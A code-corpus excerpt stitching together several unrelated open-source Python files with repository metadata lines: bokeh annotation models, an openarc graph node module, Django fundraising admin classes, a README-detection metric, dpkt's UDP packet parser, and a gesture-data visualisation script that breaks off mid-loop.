``LabelSet`` will render multiple text labels at given ``x`` and ``y``
coordinates, which can be in either screen (pixel) space, or data (axis
range) space. In this case (as opposed to the single ``Label`` model),
``x`` and ``y`` can also be the name of a column from a
:class:`~bokeh.models.sources.ColumnDataSource`, in which case the labels
will be "vectorized" using coordinate values from the specified columns.
The label can also be configured with a screen space offset from ``x`` and
``y``, by using the ``x_offset`` and ``y_offset`` properties. These offsets
may be vectorized by giving the name of a data source column.
Additionally, the label can be rotated with the ``angle`` property (which
may also be a column name.)
There are also standard text, fill, and line properties to control the
appearance of the text, its background, as well as the rectangular bounding
box border.
The data source is provided by setting the ``source`` property.
'''
x = NumberSpec(help="""
The x-coordinates to locate the text anchors.
""")
x_units = Enum(SpatialUnits, default='data', help="""
The unit type for the xs attribute. Interpreted as "data space" units
by default.
""")
y = NumberSpec(help="""
The y-coordinates to locate the text anchors.
""")
y_units = Enum(SpatialUnits, default='data', help="""
The unit type for the ys attribute. Interpreted as "data space" units
by default.
""")
text = StringSpec("text", help="""
The text values to render.
""")
angle = AngleSpec(default=0, help="""
The angles to rotate the text, as measured from the horizontal.
.. warning::
The center of rotation for canvas and css render_modes is different.
For `render_mode="canvas"` the label is rotated from the top-left
corner of the annotation, while for `render_mode="css"` the annotation
is rotated around it's center.
""")
x_offset = NumberSpec(default=0, help="""
Offset values to apply to the x-coordinates.
This is useful, for instance, if it is desired to "float" text a fixed
distance in screen units from a given data position.
""")
y_offset = NumberSpec(default=0, help="""
Offset values to apply to the y-coordinates.
This is useful, for instance, if it is desired to "float" text a fixed
distance in screen units from a given data position.
""")
text_props = Include(TextProps, use_prefix=False, help="""
The %s values for the text.
""")
background_props = Include(FillProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
background_fill_color = Override(default=None)
border_props = Include(LineProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
border_line_color = Override(default=None)
source = Instance(DataSource, default=lambda: ColumnDataSource(), help="""
Local data source to use when rendering annotations on the plot.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
render_mode = Enum(RenderMode, default="canvas", help="""
Specifies whether the text is rendered as a canvas element or as an
css element overlaid on the canvas. The default mode is "canvas".
.. note::
The CSS labels won't be present in the output using the "save" tool.
.. warning::
Not all visual styling properties are supported if the render_mode is
set to "css". The border_line_dash property isn't fully supported and
border_line_dash_offset isn't supported at all. Setting text_alpha will
modify the opacity of the entire background box and border in addition
to the text. Finally, clipping Label annotations inside of the plot
area isn't supported in "css" mode.
""")
class PolyAnnotation(Annotation):
''' Render a shaded polygonal region as an annotation.
'''
xs = Seq(Float, default=[], help="""
The x-coordinates of the region to draw.
""")
xs_units = Enum(SpatialUnits, default='data', help="""
The unit type for the xs attribute. Interpreted as "data space" units
by default.
""")
ys = Seq(Float, default=[], help="""
The y-coordinates of the region to draw.
""")
ys_units = Enum(SpatialUnits, default='data', help="""
The unit type for the ys attribute. Interpreted as "data space" units
by default.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering box annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering box annotations on the plot. If unset, use the default y-range.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the polygon.
""")
line_alpha = Override(default=0.3)
line_color = Override(default="#cccccc")
fill_props = Include(FillProps, use_prefix=False, help="""
The %s values for the polygon.
""")
fill_alpha = Override(default=0.4)
fill_color = Override(default="#fff9ba")
class Span(Annotation):
""" Render a horizontal or vertical line span.
"""
location = Float(help="""
The location of the span, along ``dimension``.
""")
location_units = Enum(SpatialUnits, default='data', help="""
The unit type for the location attribute. Interpreted as "data space"
units by default.
""")
dimension = Enum(Dimension, default='width', help="""
The direction of the span.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
render_mode = Enum(RenderMode, default="canvas", help="""
Specifies whether the span is rendered as a canvas element or as an
css element overlaid on the canvas. The default mode is "canvas".
.. warning::
The line_dash and line_dash_offset attributes aren't supported if
the render_mode is set to "css"
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the span.
""")
class Title(TextAnnotation):
''' Render a single title box as an annotation.
'''
text = String(help="""
The text value to render.
""")
align = Enum(TextAlign, default='left', help="""
Location to align the title text.
""")
offset = Float(default=0, help="""
Offset the text by a number of pixels (can be positive or negative). Shifts the text in
different directions based on the location of the title:
* above: shifts title right
* right: shifts title down
* below: shifts title right
* left: shifts title up
""")
text_font = String(default="helvetica", help="""
Name of a font to use for rendering text, e.g., ``'times'``,
``'helvetica'``.
""")
text_font_size = FontSizeSpec(default=value("10pt"))
text_font_style = Enum(FontStyle, default="bold", help="""
A style to use for rendering text.
Acceptable values are:
- ``'normal'`` normal text
- ``'italic'`` *italic text*
- ``'bold'`` **bold text**
""")
text_color = ColorSpec(default="#444444", help="""
A color to use to fill text with.
Acceptable values are:
- any of the 147 named `CSS colors`_, e.g ``'green'``, ``'indigo'``
- an RGB(A) hex value, e.g., ``'#FF0000'``, ``'#44444444'``
- a 3-tuple of integers (r,g,b) between 0 and 255
- a 4-tuple of (r,g,b,a) where r,g,b are integers between 0..255 and a is between 0..1
.. _CSS colors: http://www.w3schools.com/cssref/css_colornames.asp
""")
text_alpha = NumberSpec(default=1.0, help="""
An alpha value to use to fill text with.
Acceptable values are floating point numbers between 0 (transparent)
and 1 (opaque).
""")
background_props = Include(FillProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
background_fill_color = Override(default=None)
border_props = Include(LineProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
border_line_color = Override(default=None)
render_mode = Enum(RenderMode, default="canvas", help="""
Specifies whether the text is rendered as a canvas element or as an
css element overlaid on the canvas. The default mode is "canvas".
.. note::
The CSS labels won't be present in the output using the "save" tool.
.. warning::
Not all visual styling properties are supported if the render_mode is
set to "css". The border_line_dash property isn't fully supported and
border_line_dash_offset isn't supported at all. Setting text_alpha will
modify the opacity of the entire background box and border in addition
to the text. Finally, clipping Label annotations inside of the plot
area isn't supported in "css" mode.
""")
class Tooltip(Annotation):
''' Render a tooltip.
.. note::
This model is currently managed by BokehJS and is not useful
directly from python.
'''
level = Override(default="overlay")
attachment = Enum("horizontal", "vertical", "left", "right", "above", "below", help="""
Whether the tooltip should display to the left or right off the cursor
position or above or below it, or if it should be automatically placed
in the horizontal or vertical dimension.
""")
inner_only = Bool(default=True, help="""
Whether to display outside a central plot frame area.
""")
show_arrow = Bool(default=True, help="""
Whether tooltip's arrow should be showed.
""")
# This only exists to prevent a circular import.
def _DEFAULT_TEE():
from .arrow_heads import TeeHead
return TeeHead(level="underlay", size=10)
class Whisker(Annotation):
''' Render a whisker along a dimension.
'''
lower = DistanceSpec(help="""
The coordinates of the lower end of the whiskers.
""")
lower_head = Instance('.models.arrow_heads.ArrowHead', default=_DEFAULT_TEE, help="""
Instance of ArrowHead.
""")
upper = DistanceSpec(help="""
The coordinations of the upper end of the whiskers.
""")
upper_head = Instance('.models.arrow_heads.ArrowHead', default=_DEFAULT_TEE, help="""
Instance of ArrowHead.
""")
base = DistanceSpec(help="""
The orthogonal coordinates of the upper and lower values.
""")
dimension = Enum(Dimension, default='height', help="""
The direction of the band.
""")
source = Instance(DataSource, default=lambda: ColumnDataSource(), help="""
Local data source to use when rendering annotations on the plot.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the whisker body.
""")
level = Override(default="underlay")
|
philippjfr/bokeh
|
bokeh/models/annotations.py
|
Python
|
bsd-3-clause
| 33,790
|
__all__ = [
'OAG_RootNode',
'OAG_RootD',
'OAG_RpcDiscoverable'
]
import attrdict
import datetime
import hashlib
import inflection
import inspect
import os
import signal
import socket
import sys
from ._db import *
from ._env import *
from ._rdf import *
from ._rpc import reqcls, RpcTransaction, RpcProxy, RestProxy, RpcACL
from ._util import oagprop, staticproperty
from openarc.exception import *
from openarc.time import *
class OAG_RootNode(object):
##### Class variables
_fkframe = []
##### Proxies
@property
def cache(self):
return self._cache_proxy
@property
def db(self):
return self._db_proxy
@property
def rdf(self):
return self._rdf_proxy
@property
def props(self):
return self._prop_proxy
@property
def rpc(self):
return self._rpc_proxy
@property
def REST(self):
return self._rest_proxy
##### User defined via inheritance
@staticproperty
def context(cls):
raise NotImplementedError("Must be implemented in deriving OAGraph class")
@staticproperty
def dbindices(cls): return {}
@staticproperty
def dblocalsql(cls): return {}
@staticproperty
def infname_fields(cls):
"""Override in deriving classes as necessary"""
return sorted([k for k, v in cls.streams.items()])
@staticproperty
def is_unique(cls): return False
@staticproperty
def nonstream_deps(cls): return []
@staticproperty
def restapi(cls): return {}
@staticproperty
def streamable(cls): return True
@staticproperty
def streams(cls):
raise NotImplementedError("Must be implemented in deriving OAGraph class")
##### Derivative fields
@staticproperty
def dbpkname(cls): return "_%s_id" % cls.dbtable
@staticproperty
def dbtable(cls):
ca_prop = getattr(cls, '_dbtable_name', ())
if not ca_prop or (len(ca_prop)>0 and ca_prop[0]!=cls):
db_table_name = inflection.underscore(cls.__name__)[4:]
setattr(cls, '_dbtable_name', (cls, db_table_name))
if not cls.is_reversible:
raise OAError("This table name isn't reversible: [%s]" % cls.__name__)
return cls._dbtable_name[1]
@classmethod
def is_oagnode(cls, stream):
try:
streaminfo = cls.streams[stream][0]
if type(streaminfo).__name__=='type':
return 'OAG_RootNode' in [x.__name__ for x in inspect.getmro(streaminfo)]
else:
return False
except KeyError:
return False
@classmethod
def is_scalar(cls, stream):
try:
return type(cls.streams[stream][0])==str
except KeyError:
# Stay with me here: if there's a key error, you've either fed this
# function junk data, or an internal member beginning with '_'; return
# True.
return True
@classmethod
def is_enum(cls, stream):
try:
return cls.is_scalar(stream)==False and cls.is_oagnode(stream)==False
except KeyError:
return False
@staticproperty
def is_reversible(cls):
ca_prop = getattr(cls, '_is_reversible', ())
if not ca_prop or (len(ca_prop)>0 and ca_prop[0]!=cls):
reverse_class_name = "OAG_"+inflection.camelize(cls.dbtable)
setattr(cls, '_is_reversible', (cls, reverse_class_name == cls.__name__))
return cls._is_reversible[1]
@staticproperty
def stream_db_mapping(cls):
ca_prop = getattr(cls, '_stream_db_mapping', ())
if not ca_prop or (len(ca_prop)>0 and ca_prop[0]!=cls):
schema = {}
for stream, streaminfo in cls.streams.items():
if cls.is_oagnode(stream):
schema[stream] = streaminfo[0].dbpkname[1:]+'_'+stream
else:
schema[stream] = stream
setattr(cls, '_stream_db_mapping', (cls, schema))
return cls._stream_db_mapping[1]
@staticproperty
def db_stream_mapping(cls):
ca_prop = getattr(cls, '_db_stream_mapping', ())
if not ca_prop or (len(ca_prop)>0 and ca_prop[0]!=cls):
setattr(cls, '_db_stream_mapping', (cls, {cls.stream_db_mapping[k]:k for k in cls.stream_db_mapping}))
return cls._db_stream_mapping[1]
##### User API
@property
def id(self):
try:
return self.props._cframe[self.dbpkname]
except:
return None
@property
def infname(self):
if len(self.props._cframe)==0:
raise OAError("Cannot calculate infname if OAG attributes have not set")
hashstr = str()
for stream in self.infname_fields:
node = getattr(self, stream, None)
hashstr += node.infname if self.is_oagnode(stream) and node else str(node)
return hashlib.sha256(hashstr.encode('utf-8')).hexdigest()
@property
def infname_semantic(self):
if None in [self.db.searchidx, self.db.searchprms]:
raise OAError("Cannot calculate infname_semantic if search parameters are not initialized")
hashstr = str()
hashstr += self.context
hashstr += self.__class__.__name__
hashstr += self.db.searchidx
for searchprm in self.db.searchprms:
hashstr += str(searchprm)
return hashlib.sha256(hashstr.encode('utf-8')).hexdigest()
@property
def is_materialized(self):
"""Has been persisted to the database"""
return self.id is not None
def clone(self):
oagcopy = self.__class__()
oagcopy._iteridx = 0
# Clone proxies
oagcopy.rdf.clone(self)
oagcopy.db.clone(self)
oagcopy.props.clone(self)
if oagcopy.is_unique:
oagcopy.props._set_attrs_from_cframe_uniq()
return oagcopy
def reset(self, idxreset=True):
self.rdf._rdf_window = self.rdf._rdf
if idxreset:
self._iteridx = 0
self.props._set_attrs_from_cframe()
return self
@property
def size(self):
if self.rdf._rdf_window is None:
return 0
else:
return len(self.rdf._rdf_window)
@property
def url(self):
return self.rpc.url
##### Stream attributes
##### Internals
def __del__(self):
# If the table isn't reversible, OAG would never have been created
if not self.is_reversible:
return
oalog.debug(f"GC=========>", f='gc')
oalog.debug("Deleting {} {}, {}, proxy: {}".format(
self,
self.rpc.id if self.rpc.is_enabled else str(),
self.rpc.url if self.rpc.is_enabled else str(),
self.rpc.is_proxy
), f='gc')
if self.rpc.is_enabled:
# Tell upstream proxies that we are going away
if self.rpc.is_proxy:
oalog.debug(f"Delete: proxies", f='gc')
oalog.debug(f"--> {self.rpc.proxied_url}", f='gc')
oactx.rm_ka_via_rpc(self.rpc.url, self.rpc.proxied_url, 'proxy')
# Tell upstream registrations that we are going away
oalog.debug(f"Delete: registrations", f='gc')
oalog.debug(f"--> {self.rpc.registrations}", f='gc')
# Tell subnodes we are going away
oalog.debug(f"Delete cache", f='gc')
oalog.debug(f"--> {self.cache.state}", f='gc')
self.cache.clear()
oalog.debug(f"Delete: queue size", f='gc')
oalog.debug(f"--> {oactx.rm_queue_size}", f='gc')
# print("Delete: stop router")
# self.rpc._glets[0].kill()
oalog.debug("<=========GC", f='gc')
def __enter__(self):
self.rpc.discoverable = True
return self
def __exit__(self, type, value, traceback):
self.rpc.discoverable = False
def __getattribute__(self, attr):
"""Cascade through the following lookups:
1. Attempt a lookup via the prop proxy
2. Attempt to retrieve via RPC if applicable.
3. Attempt a regular attribute lookup.
Failure at each step is denoted by the generation of an AttributeError"""
try:
props = object.__getattribute__(self, '_prop_proxy')
return props.get(attr, internal_call=True)
except AttributeError as e:
pass
try:
if object.__getattribute__(self, 'is_proxy'):
rpc = object.__getattribute__(self, '_rpc_proxy')
if attr in rpc.proxied_streams:
oalog.debug(f"[{rpc.id}] proxying request for [{attr}] to [{rpc.proxied_url}]", f='rpc')
payload = reqcls(self).getstream(rpc.proxied_url, attr)['payload']
if payload['value']:
if payload['type'] == 'redirect':
for cls in OAG_RootNode.__subclasses__():
if cls.__name__==payload['class']:
return cls(initurl=payload['value'])
else:
return payload['value']
else:
raise AttributeError("[%s] does not exist at [%s]" % (attr, rpc.proxied_url))
except AttributeError:
pass
return object.__getattribute__(self, attr)
def __getitem__(self, indexinfo, preserve_cache=False):
self.rdf._rdf_window_index = indexinfo
if self.is_unique:
raise OAError("Cannot index OAG that is marked unique")
if not preserve_cache and self._iteridx != self.rdf._rdf_window_index:
self.cache.clear()
if type(self.rdf._rdf_window_index)==int:
self.props._cframe = self.rdf._rdf_window[self.rdf._rdf_window_index]
elif type(self.rdf._rdf_window_index)==slice:
self.rdf._rdf_window = self.rdf._rdf_window[self.rdf._rdf_window_index]
self.props._cframe = self.rdf._rdf_window[0]
self.props._set_attrs_from_cframe()
return self
@classmethod
def __graphsubclasses__(cls):
subclasses = cls.__subclasses__()
for subclass in cls.__subclasses__():
subclasses += subclass.__graphsubclasses__()
return subclasses
def __init__(
self,
# Implied positional args
searchprms=[],
searchidx='id',
searchwin=None,
searchoffset=None,
searchdesc=False,
# Actual Named args
throw_on_empty=True,
heartbeat=True,
initprms={},
initurl=None,
initschema=True,
rest=False,
rpc=True,
rpc_acl=RpcACL.LOCAL_ALL,
rpc_dbupdate_listen=False,
rpc_discovery_timeout=0):
# Initialize environment
oainit(oag=self)
# Alphabetize
self._iteridx = 0
self.is_proxy = not initurl is None
#### Set up proxies
# Database API
self._db_proxy = DbProxy(self, searchprms, searchidx, searchwin, searchoffset, searchdesc, initschema, throw_on_empty)
# Relational Dataframe manipulation
self._rdf_proxy = RdfProxy(self)
# Set attributes on OAG and keep them in sync with cframe
self._prop_proxy = PropProxy(self)
# Manage oagprop state
self._cache_proxy = CacheProxy(self)
# All RPC operations
self._rpc_proxy = RpcProxy(self,
initurl=initurl,
rpc_enabled=rpc,
rpc_acl_policy=rpc_acl,
rpc_dbupdate_listen=rpc_dbupdate_listen,
rpc_discovery_timeout=rpc_discovery_timeout,
heartbeat_enabled=heartbeat)
# All REST operations
self._rest_proxy = RestProxy(self, rest_enabled=rest)
if not self._rpc_proxy.is_proxy:
self._prop_proxy._set_cframe_from_userprms(initprms, force_attr_refresh=True)
if self.db.searchprms:
self.db.search()
if self.is_unique:
self.props._set_attrs_from_cframe_uniq()
else:
self._rpc_proxy.proxied_streams = reqcls(self).register_proxy(self._rpc_proxy.proxied_url, 'proxy')['payload']
oalog.debug("Create {}, {}, {}".format(
self,
self.rpc.id if self.rpc.is_enabled else str(),
f"listening on {self.rpc.url}" if self.rpc.is_enabled else str()
), f='gc')
def __iter__(self):
if self.is_unique:
raise OAError("__iter__: Unique OAGraph object is not iterable")
else:
return self
def __next__(self):
if self.is_unique:
raise OAError("__next__: Unique OAGraph object is not iterable")
else:
if self._iteridx < self.size:
# Clear propcache
self.props.clear()
# Clear oagcache
self.cache.clear()
# Set cframe according to rdf
self.props._cframe = self.rdf._rdf_window[self._iteridx]
# Set attributes from cframe
self.props._set_attrs_from_cframe()
# Set up next iteration
self._iteridx += 1
return self
else:
self._iteridx = 0
self.cache.clear()
raise StopIteration()
def __setattr__(self, attr, newval, fastiter=False):
try:
# Sanity check
if self.rpc.is_proxy and attr in self.rpc.proxied_streams:
raise OAError("Cannot set value on a proxy OAG")
# Set new value
currval = self.props.add(attr, newval, None, None, False, False, fastiter)
except (AttributeError, OAGraphIntegrityError):
# Attribute errors means object has not been completely
# initialized yet; graph integrity errors mean we used
# property manager to manage property on the stoplist.
#
# In either case, default to using the default __setattr__
super(OAG_RootNode, self).__setattr__(attr, newval)
class OAG_RpcDiscoverable(OAG_RootNode):
@property
def is_unique(self): return False
@property
def context(self): return "openarc"
@staticproperty
def dbindices(cls):
return {
#Index Name------------Elements------Unique-------Partial
'rpcinfname_idx' : [ ['rpcinfname'], True , None ]
}
@staticproperty
def streams(cls): return {
'envid' : [ 'text', "", None ],
'heartbeat' : [ 'timestamp', "", None ],
'listen' : [ 'boolean', True, None ],
'rpcinfname' : [ 'text', "", None ],
'stripe' : [ 'int', 0 , None ],
'type' : [ 'text', "", None ],
'url' : [ 'text', "", None ],
}
@property
def is_valid(self):
return OATime().now-self.heartbeat < datetime.timedelta(seconds=oaenv.rpctimeout)
class OAG_RootD(OAG_RootNode):
@staticproperty
def context(cls): return "openarc"
@staticproperty
def daemonname(cls): return cls.dbtable
@staticproperty
def dbindices(cls): return {
'host' : [ ['host'], False, None ]
}
@staticproperty
def streams(cls): return {
'host' : [ 'text', str, None ],
'port' : [ 'int', int, None ],
}
@staticproperty
def streamable(cls): return False
def __enter__(self):
try:
self.db.create()
with open(self.pidfile, 'w') as f:
f.write(str(os.getpid()))
return self
except Exception as e:
print('[STARTUP ERROR]', e)
self.__exit__(code=1)
def __exit__(self, *args, code=0):
try:
self.db.delete()
except Exception as e:
print('[CLEANUP WARNING]', e)
try:
os.unlink(self.pidfile)
except Exception as e:
print('[CLEANUP WARNING]', e)
sys.exit(code)
def start(self, pidfile=None, cfgfile=None):
def get_cfg_file_path():
# If cfgfile has been specified, you are lucky. If not, do song
# and dance to figure out where it is.
if cfgfile:
cfg_file_path = cfgfile
else:
cfgname = f'{self.daemonname}.conf'
cfg_dir = os.environ.get("XDG_CONFIG_HOME")
if not cfg_dir:
for l in [f'~/.config/{cfgname}', f'/usr/local/etc/{cfgname}' ]:
cfg_file_path = os.path.expanduser(l)
if os.path.exists(cfg_file_path):
break
else:
cfg_file_path = os.path.join(cfg_dir, f'{cfgname}')
return cfg_file_path
oaenv.merge_app_cfg(get_cfg_file_path())
def get_pid_file_path():
if pidfile:
return pidfile
else:
pidname = f'{self.daemonname}.pid'
xdg_rdir = os.environ.get("XDG_RUNTIME_DIR")
rdir = xdg_rdir if xdg_rdir else '/var/run'
return f'{rdir}/{pidname}'
self.pidfile = get_pid_file_path()
hostname = socket.gethostname()
# Are there too many stripes?
allowed_ports = [oaenv.app.startport+stripe for stripe in range(oaenv.app.stripes)]
try:
_d = self.__class__(hostname, 'by_host')
occupied_ports = [dd.port for dd in _d]
except OAGraphRetrieveError as e:
occupied_ports = []
if len(occupied_ports)==len(allowed_ports):
raise OAError("All necessary stripes are already running")
# set up and run this daemon
self.host = hostname
self.port = list(set(allowed_ports)-set(occupied_ports))[0]
with self as daemon:
signal.signal(signal.SIGTERM, self.__exit__)
signal.signal(signal.SIGINT, self.__exit__)
daemon.REST.start(port=self.port)
|
kchoudhu/openarc
|
openarc/_graph.py
|
Python
|
bsd-3-clause
| 18,675
|
from django.contrib import admin
from django.db.models import Sum
from sorl.thumbnail.admin import AdminImageMixin
from .admin_views import download_donor_report
from .models import DjangoHero, Donation, InKindDonor, Payment, Testimonial
class DonatedFilter(admin.DateFieldListFilter):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.title = 'donation date'
class DonationInline(admin.TabularInline):
fields = ['id', 'created', 'interval', 'subscription_amount']
extra = 0
model = Donation
@admin.register(DjangoHero)
class DjangoHeroAdmin(AdminImageMixin, admin.ModelAdmin):
actions = [download_donor_report]
inlines = [DonationInline]
list_filter = [
'approved', 'created', 'modified', 'hero_type', 'is_visible',
'is_subscribed', ('donation__created', DonatedFilter),
]
list_display = ['id', 'name', 'email', 'created', 'modified', 'approved', 'hero_type']
list_editable = ['approved', 'hero_type']
ordering = ['-created']
search_fields = ['name', 'email', 'stripe_customer_id']
class PaymentInline(admin.TabularInline):
readonly_fields = ['date']
extra = 0
model = Payment
@admin.register(Donation)
class Donation(admin.ModelAdmin):
raw_id_fields = ['donor']
list_display = ['id', 'amount', 'donor', 'created', 'modified', 'is_active']
list_filter = ['created', 'modified', 'interval']
ordering = ['-created']
inlines = [PaymentInline]
search_fields = ['donor__name', 'donor__email', 'donor__stripe_customer_id']
def get_queryset(self, request):
"""Annotate the sum of related payments to every donation."""
qs = super(Donation, self).get_queryset(request)
return qs.annotate(amount=Sum('payment__amount'))
def amount(self, obj):
# Since amount is an annotated field, it is not recognized as a property
# of the model for list_display so we need an actual method that
# references it.
return obj.amount
@admin.register(Payment)
class PaymentAdmin(admin.ModelAdmin):
list_display = ('id', 'amount', 'stripe_charge_id', 'date', 'donation')
list_select_related = ('donation__donor',)
ordering = ['-date']
raw_id_fields = ('donation',)
search_fields = [
'stripe_charge_id',
'donation__donor__name',
'donation__donor__email',
'donation__donor__stripe_customer_id',
]
@admin.register(Testimonial)
class Testimonial(admin.ModelAdmin):
pass
admin.site.register(InKindDonor)
|
nanuxbe/django
|
fundraising/admin.py
|
Python
|
bsd-3-clause
| 2,556
|
import logging
import plugins.metric.metric as metric
class ReadmeMetric(metric.Metric):
"""
Locate a README file
Looks in the root of the repository, for files named: 'README', 'README.txt', 'README.md', 'README.html'
Scores:
0 if no README found
100 if README file with non-zero length contents is found
"""
NAME = "README"
IDENTIFIER = "uk.ac.software.saf.readme"
SELF_ASSESSMENT = False
CATEGORY = "USABILITY"
SHORT_DESCRIPTION = "Has a README file?"
LONG_DESCRIPTION = "Test for the existence of file 'README'."
def run(self, software, helper):
"""
:param software: An Software entity
:param helper: A Repository Helper
:return:
"""
self.score = 0
candidate_files = helper.get_files_from_root(['README', 'README.txt', 'README.md', 'README.html'])
for file_name, file_contents in candidate_files.items():
logging.info('Locating README')
self.score = 0
if file_contents is not None:
self.score = 100
self.feedback = "README found"
break
else:
self.score = 0
self.feedback = "A short, descriptive, README file can provide a useful first port of call for new users."
def get_score(self):
"""Get the results of running the metric.
:returns:
0 if no README found
100 if an identifiable README is found
"""
return self.score
def get_feedback(self):
"""
A few sentences describing the outcome, and providing tips if the outcome was not as expected
:return:
"""
return self.feedback
|
softwaresaved/software-assessment-framework
|
plugins/metric/readme.py
|
Python
|
bsd-3-clause
| 1,737
|
# $Id: udp.py 23 2006-11-08 15:45:33Z dugsong $
"""User Datagram Protocol."""
import dpkt
import dns
UDP_PORT_MAX = 65535
class UDP(dpkt.Packet):
__hdr__ = (
('sport', 'H', 0xdead),
('dport', 'H', 0),
('ulen', 'H', 8),
('sum', 'H', 0)
)
def unpack(self, buf):
dpkt.Packet.unpack(self, buf)
if self.sport == 53 or self.dport == 53:
# Assume it's DNS
self.data = dns.DNS(self.data)
|
insomniacslk/dpkt
|
dpkt/udp.py
|
Python
|
bsd-3-clause
| 473
|
import os
from matplotlib import pyplot as plt
import numpy as np
import matplotlib.gridspec as gridspec
import class_objects as co
import cv2
import action_recognition_alg as ara
from textwrap import wrap
def extract_valid_action_utterance(action, testing=False, *args, **kwargs):
'''
Visualizes action or a testing dataset using predefined locations in
config.yaml and the method co.draw_oper.plot_utterances
'''
dataset_loc = '/media/vassilis/Thesis/Datasets/PersonalFarm/'
results_loc = '/home/vassilis/Thesis/KinectPainting/Results/DataVisualization'
ground_truth,breakpoints,labels = co.gd_oper.load_ground_truth(action, ret_labs=True,
ret_breakpoints=True)
images_base_loc = os.path.join(dataset_loc, 'actions',
'sets' if not testing else 'whole_result')
images_loc = os.path.join(images_base_loc, action.replace('_',' ').title())
imgs, masks, sync, angles, centers, samples_indices = co.imfold_oper.load_frames_data(images_loc,masks_needed=True)
masks_centers = []
xdim = 0
ydim = 0
conts = []
tmp = []
for mask,img in zip(masks,imgs):
conts = cv2.findContours(mask,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[1]
conts_areas = [cv2.contourArea(cont) for cont in conts]
tmp.append(np.sum(mask*img>0))
if np.sum(mask*img>0) < 500:
masks_centers.append(None)
else:
cont = conts[np.argmax(conts_areas)]
x,y,w,h = cv2.boundingRect(cont)
if w == 0 or h == 0:
masks_centers.append(None)
else:
masks_centers.append([y+h/2,x+w/2])
xdim = max(w,xdim)
ydim = max(h,ydim)
cropped_imgs = []
for img, center in zip(imgs, masks_centers):
if center is not None:
cropped_img =img[max(0,center[0]-ydim/2)
:min(img.shape[0],center[0]+ydim/2),
max(0,center[1]-xdim/2)
:min(img.shape[0],center[1]+xdim/2)]
inp_img = np.zeros((ydim, xdim))
inp_img[:cropped_img.shape[0],:cropped_img.shape[1]] = cropped_img
cropped_imgs.append(inp_img)
else:
cropped_imgs.append(None)
return cropped_imgs, sync, ground_truth, breakpoints, labels
def construct_table(action_type):
fil = os.path.join(co.CONST['rosbag_location'],
'gestures_type.csv')
if os.path.exists(fil):
with open(fil, 'r') as inp:
for line in inp:
if line.split(':')[0].lower() == action_type.lower():
used_actions = line.split(
':')[1].rstrip('\n').split(',')
else:
raise Exception()
SHOWN_IMS = 10
actions = [action for action in os.listdir(co.CONST['actions_path'])
if action in used_actions]
print actions
images=[]
for action in actions:
print 'Processing', action
whole = os.path.join(co.CONST['actions_path'],action)
cnt = 0
(frames, frames_sync,
ground_truth, breakpoints, labels) =\
extract_valid_action_utterance(action.replace(' ','_').lower())
for (start, end) in zip(breakpoints[action][0],
breakpoints[action][1]):
if (start in frames_sync
and end in frames_sync and
end-start > SHOWN_IMS):
rat_of_nans = sum([img is None for img
in frames[frames_sync.index(start):
frames_sync.index(end)]]) / float(
end-start+1)
if rat_of_nans < 0.1:
break
cnt += 1
masks = os.path.join(whole, co.CONST['hnd_mk_fold_name'], str(cnt))
data = os.path.join(whole, co.CONST['mv_obj_fold_name'], str(cnt))
start = breakpoints[action][0][cnt]
end = breakpoints[action][1][cnt]
angles = []
with open(os.path.join(data, 'angles.txt'), 'r') as inp:
angles += map(float, inp)
centers = []
with open(os.path.join(data, 'centers.txt'), 'r') as inp:
for line in inp:
center = [
float(num) for num
in line.split(' ')]
centers += [center]
fils = sorted(os.listdir(masks))
inds = np.array([int(filter(str.isdigit,fil)) for fil in fils])
imgset = []
prev_size = 0
for ind in (np.linspace(0,len(fils)-1,SHOWN_IMS)).astype(int):
count = ind
while True:
mask = cv2.imread(os.path.join(masks, fils[ind]),0)>0
if np.sum(mask) > 0.6 * (prev_size) or count == len(inds)-1:
prev_size = np.sum(mask)
break
else:
count += 1
img = (cv2.imread(os.path.join(data,fils[count]),-1)*
mask)
processed_img = co.pol_oper.derotate(
img,
angles[count], centers[count])
img,_,_ = ara.prepare_im(processed_img,square=True)
img = np.pad(cv2.equalizeHist(img.astype(np.uint8)),[[0,0],[5,5]],
mode='constant', constant_values=155)
imgset.append(img)
images.append(imgset)
images = np.array(images)
images = list(images)
im_indices = np.arange(SHOWN_IMS)
left, width = .25, .5
bottom, height = .25, .5
right = left + width
top = bottom + height
gs = gridspec.GridSpec(len(images), 1+SHOWN_IMS)
gs.update(wspace=0.0, hspace=0.0)
fig = plt.figure(figsize=(1+SHOWN_IMS, len(images)))
fig_axes = fig.add_subplot(gs[:,:],adjustable='box-forced')
fig_axes.set_xticklabels([])
fig_axes.set_yticklabels([])
fig_axes.set_xticks([])
fig_axes.set_yticks([])
fig_axes.set_aspect('auto')
fig.subplots_adjust(wspace=0, hspace=0)
im_inds = np.arange(len(images)*(1+SHOWN_IMS)).reshape(
len(images),1+SHOWN_IMS)[:,1:].ravel()
txt_inds = np.arange(len(images)*(1+SHOWN_IMS)).reshape(
len(images),1+SHOWN_IMS)[:,:1].ravel()
axes = [fig.add_subplot(gs[i]) for i in range(len(images)*
(1+SHOWN_IMS))]
im_axes = list(np.array(axes)[im_inds])
for axis in axes:
